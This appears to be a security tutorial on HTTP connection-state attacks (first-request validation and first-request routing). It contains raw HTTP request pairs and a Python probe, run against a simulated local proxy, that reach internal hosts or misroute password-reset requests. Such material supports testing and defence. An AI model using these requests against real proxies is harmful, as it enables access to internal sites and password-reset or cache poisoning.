HTTP Connection Request Smuggling

Connection state attacks

First-request validation

Reverse proxies often use the Host header to decide which back-end server a request is routed to, and keep a whitelist of the hosts that external clients are allowed to reach.
However, some proxies apply this whitelist only to the first request sent over a given client connection and treat the connection as validated afterwards. An attacker can then reach internal websites by sending a request for an allowed host, followed by a request for the internal host down the same connection:
```http
GET / HTTP/1.1
Host: redacted

GET / HTTP/1.1
Host: intranet.redacted
```
Mercifully, this mistake is quite rare.

First-request routing

First-request routing occurs when the front-end uses the first request's Host header to decide which back-end to route the request to, and then routes all subsequent requests from the same client connection down the same back-end connection.
```http
GET / HTTP/1.1
Host: example.com

POST /pwreset HTTP/1.1
Host: psres.net
```
In the example above the password-reset request for psres.net is handled by the back-end that serves example.com, even though its own Host header names a different site. This can be chained with Host header attacks such as password reset poisoning, web cache poisoning, and gaining access to other virtual hosts.
You can scan for both flaws using the 'connection-state probe' option in HTTP Request Smuggler (the Burp Suite extension).
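The probes below reproduce, for both flaws in this section, what a connection-state probe measures: the same request is sent on a fresh connection and then as the second request on a connection that already carried an allowed request, and the two answers are compared. This is an added example, not code from HackTricks or from the HTTP Request Smuggler extension. So that it runs offline it also contains a small simulated reverse proxy; its hostnames (`public.example`, `other.example`, `intranet.example`), allowlist and back-end names are constructed for the demonstration, and the back-ends identify themselves in the response body, which a real target would not do (there you compare Server headers, cookie names or page content instead).

```python
"""Connection-state probes for first-request validation and first-request routing.

Added example (not HackTricks or HTTP Request Smuggler code). The proxy, hosts
and back-end names below are constructed so the probes can run offline.
"""
import socket
import threading

# Constructed configuration of the simulated proxy.
ALLOWED_HOSTS = {"public.example", "other.example"}
BACKENDS = {"public.example": "backend-A", "other.example": "backend-B",
            "intranet.example": "intranet-backend"}


def build_request(method, path, host, body=b""):
    """Minimal HTTP/1.1 request that asks the peer to keep the connection open."""
    head = f"{method} {path} HTTP/1.1\r\nHost: {host}\r\nConnection: keep-alive\r\n"
    if body:
        head += f"Content-Length: {len(body)}\r\n"
    return head.encode() + b"\r\n" + body


def read_message(f):
    """Read one HTTP/1.1 message (start line, headers, Content-Length body)."""
    start = f.readline()
    if not start:
        return None  # peer closed the connection
    headers = {}
    while True:
        line = f.readline()
        if line in (b"", b"\r\n", b"\n"):
            break
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    body = f.read(int(headers.get("content-length", 0)))
    return start.decode("latin-1").strip(), headers, body


def exchange(sock, f, raw_request):
    """Send one request on an already open connection; return (status, body)."""
    sock.sendall(raw_request)
    msg = read_message(f)
    if msg is None:
        return None, b""
    status_line, _, body = msg
    return int(status_line.split()[1]), body


def probe_first_request_validation(addr, allowed_host, internal_host):
    """(status on a fresh connection, status after an allowed request on the same one)."""
    target = build_request("GET", "/", internal_host)
    with socket.create_connection(addr) as s:
        fresh, _ = exchange(s, s.makefile("rb"), target)
    with socket.create_connection(addr) as s:
        f = s.makefile("rb")
        exchange(s, f, build_request("GET", "/", allowed_host))  # warm up the connection
        warmed, _ = exchange(s, f, target)
    return fresh, warmed


def probe_first_request_routing(addr, first_host, second_host):
    """Names of the back-ends that answered two requests sent down one connection."""
    with socket.create_connection(addr) as s:
        f = s.makefile("rb")
        _, body1 = exchange(s, f, build_request("GET", "/", first_host))
        _, body2 = exchange(s, f, build_request("POST", "/pwreset", second_host))
    return body1.split()[0].decode(), body2.split()[0].decode()


def _serve_connection(conn, validate_each, route_each):
    """Simulated proxy. The buggy variants keep validation/routing as connection state."""
    f = conn.makefile("rb")
    validated, backend = False, None
    while True:
        msg = read_message(f)
        if msg is None:
            break
        request_line, headers, _ = msg
        host = headers.get("host", "")
        if validate_each or not validated:       # first-request validation when False
            if host not in ALLOWED_HOSTS:
                conn.sendall(b"HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n")
                break
            validated = True
        if route_each or backend is None:        # first-request routing when False
            backend = BACKENDS.get(host, "default-backend")
        body = f"{backend} handled {request_line} with Host {host}".encode()
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body) + body)
    conn.close()


def start_proxy(validate_each=True, route_each=True):
    """Start the simulated proxy on 127.0.0.1 and return its (host, port)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen()

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_connection,
                             args=(conn, validate_each, route_each), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()


if __name__ == "__main__":
    print("validation:", probe_first_request_validation(
        start_proxy(validate_each=False), "public.example", "intranet.example"))
    print("routing:   ", probe_first_request_routing(
        start_proxy(route_each=False), "public.example", "other.example"))
```

Against the vulnerable variants the validation probe returns 403 on the fresh connection but 200 after the allowed request, and the routing probe shows the `POST /pwreset` for `other.example` answered by `backend-A`; a proxy that validates and routes every request returns 403 and `backend-B` respectively. Note that the probe sends the second request only after the first response has been read, rather than pipelining both, so that a proxy which does not support pipelining cannot mask the result.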